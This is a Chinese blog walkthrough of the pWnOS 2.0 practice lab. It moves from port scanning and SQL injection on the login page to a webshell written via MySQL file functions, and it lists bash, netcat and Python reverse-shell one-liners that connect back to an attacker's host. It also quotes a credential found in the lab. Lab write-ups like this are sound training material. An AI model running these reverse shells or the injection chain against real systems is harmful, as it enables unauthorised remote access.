pWnOS 2.0

最新推荐文章于 2024-03-12 18:43:25 发布
最新推荐文章于 2024-03-12 18:43:25 发布
阅读量534 收藏
点赞数
分类专栏: OSCP靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lonelyhat/article/details/105840547
版权

目标IP 10.10.10.100 需要把NAT设置改为10.0网段

开放的端口只有两个

22 版本没有可利用漏洞 可以爆破

80 apache暂无可用exp 扫描目录

网页中有两个与数据库进行数据交互的地方 注册和登录

进行sql注入测试

登陆页面存在注入 获取登陆密码 登陆后没有有用的信息

@isints:killerbeesareflying

尝试使用load_file函数和into oufile 来读写文件

上传一句话

命令执行

在这里我尝试使用了bash和nc的反弹shell都没有成功

直到使用python的反弹shell才获取到

bash: bash -i >& /dev/tcp/ip/port 0>&1

nc: nc -e /bin/sh ip port 

python: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

使用python的反弹shell

开始提权

提权的前提也要收集信息 

登陆失败

这里就直接登录成功了

梵歆
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWNOSv2.0:Desarrollo del CTF PWNOSv2.0
03-06
PWNOSv2.0 Desarrollo del CTF PWNOSv2.0 下载: : 1.配置。 IP地址为10.10.10.100的虚拟虚拟环境配置。 视在实体之间的差异而进行的配置。2.埃斯卡诺-德波多斯root@kali:~/PWNOS# nmap -n -P0 -p- -sC -sV -O -T5 -...
红队打靶:pWnOS2.0打靶思路详解(vulnhub)
Bossfrank的博客
06-27 967
本文详述了vulnhub靶机pWnOS2.0的打靶全过程。靶机难度不高,但渗透的思路清晰,环环相扣。本文打靶涉及SQL注入、searchsploit漏洞利用、不安全的文件上传、敏感信息搜索等等。
pWnOS2.0靶场渗透练习&udf提权&推荐练习靶场&较经典的web渗透靶场&红队靶场
最新发布
jockerboss的博客
03-12 898
pWnOS2.0靶场练习&udf提权&推荐练习靶场&较经典的web渗透靶场&小白必练
【学渗透靶机 ——pWnOS: 2.0
jieli0901227的博客
04-12 248
靶机IP固定10.10.10.100,需要配置虚拟机NAT的IP,如下图所示,靶机的web目录是/var/www, 并且发现了一个配置文件,查看这个配置文件,使用命令查看是否安装nc 或者python,发现nc、和python 环境都有。主机开放了22 、80 端口 ,扫描这两个端口详细信息,扫描结果如下图。发现又有个账号root \goodday 尝试ssh 登录 失败,收集数据库信息获取到当前用户为root ,权限比较高,发现有登录和注册界面跳转,尝试访问看看。发现数据库配置文件:读取该文件信息。
vulnhub靶机pWnOS2.0
weixin_53665747的博客
06-13 138
偏简单,整体思路没有太难,利用过程也相对顺利。
靶场实战之pWnOS2.0
qq_55415442的博客
07-14 120
靶场实战之pWnOS2.0
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Holynix-开源
07-01
与 de-ice pentest CD 和 pWnOS 类似,Holynix 是一个 Linux vmware 映像,它被故意构建为具有安全漏洞以进行渗透测试。 访问 http://pynstrom.com/forum/ 以获得设置或完成挑战的帮助。
VulnHub-PWNOS: 2.0 (PRE-RELEASE)手动复现msf POC
shulao2010的博客
06-11 141
通过一个简单靶场,手动复现msfconsole的POC
PWNOS_ 2.0 (PRE-RELEASE)
qq_57672166的博客
01-04 327
PWNOS_ 2.0 (PRE-RELEASE)
PWNOS: 2.0 (PRE-RELEASE)
Mysmycbx的博客
03-14 149
pwnos2.0
渗透测试:MySQL数据库UDF提权详解
Bossfrank的博客
06-30 1665
本文介绍了渗透测试的常规提权方法——MySQL UDF提权。全面详解了UDF、UDF提权原理与提权过程。以vulhub靶机pWnOS2.0为例,详解了提权的过程。读者可根据本文进行复现学习。
黑客零基础第三章-Web漏洞实战-SQL注入pWnOS: 2.0
ShadowBlade
08-29 1393
第八节内容讲述了文件上传漏洞的利用原理,并在DVWA上进行简单的入侵实验。本节以实战的方式,结合vulnhub靶机pWnOS: 2.0,让大家进一步SQL注入的实际应用场景。
vulnhub pWnOS_v2.0
n1ght的博客
01-27 161
尝试着去做一些ctf题目和靶机,vulnhub的难度还是非常的友好,熟悉一下。这个靶机pWnOS_v2.0还是需要自己配置网络地址的。
Vulnhub靶机:PWNOS_ 2.0 (PRE-RELEASE)
LainWith的博客
12-23 1230
pWnOS(此系列共2台)发布日期:2011年7月4日难度:中运行环境:VMware Workstation目标:取得 root 权限补充:靶机是静态IP,因此需要配置网卡为10.10.10.0主机发现端口扫描+漏洞扫描CMS漏洞利用SQL读写文件敏感信息提权。
pWnOS v2.0靶机渗透测试流程 儿童版
RemedyVI的博客
07-14 91
本次靶机较简单,通过sql注入上传webshell,获取反弹shell,最后通过敏感文件发现数据库用户名密码,通过ssh登录成功到root。其实/var/www目录下有一个假的敏感文件,账户root密码goodday,但是没办法登录。blog是一个simple php blog,可以通过访问blog目录的index.php查看源代码找到,版本号为0.4.0,也是有SQL注入和命令执行等许多漏洞。
红队打靶:pWnOS1.0打靶思路详解之ssh私钥破解+shellshock漏洞提权
Bossfrank的博客
07-01 1088
本文详述了vulnhub靶机pWnOS1.0的详细打靶的第二种方法。打靶过程涉及到关于webmin任意文件泄露、ssh私钥碰撞、shellshock漏洞提权等。自己动手才发现问题很多,这个靶机的知识点还是很丰富。
记录一次pWnOS1.0打靶(vulnhub) webmin漏洞利用
chencyyan的博客
01-14 997
萌新第一次写blog,各位大佬别喷。有错误和补充的地方希望各位大佬各位师傅指出​本博客内容借鉴Bossfrank和红队笔记大佬「红队笔记」靶机精讲:pWnOS1.0 - 在Perl CGI架构下构造反弹shell,你可以吗?红队打靶:pWnOS1.0打靶思路详解之webmin漏洞利用​[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传](https://img-home.csdnimg.cn/images/20230724024159.png?
PWNOS: 1.0 解法一
Mysmycbx的博客
03-14 390
PWNOS1.0 解法一

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值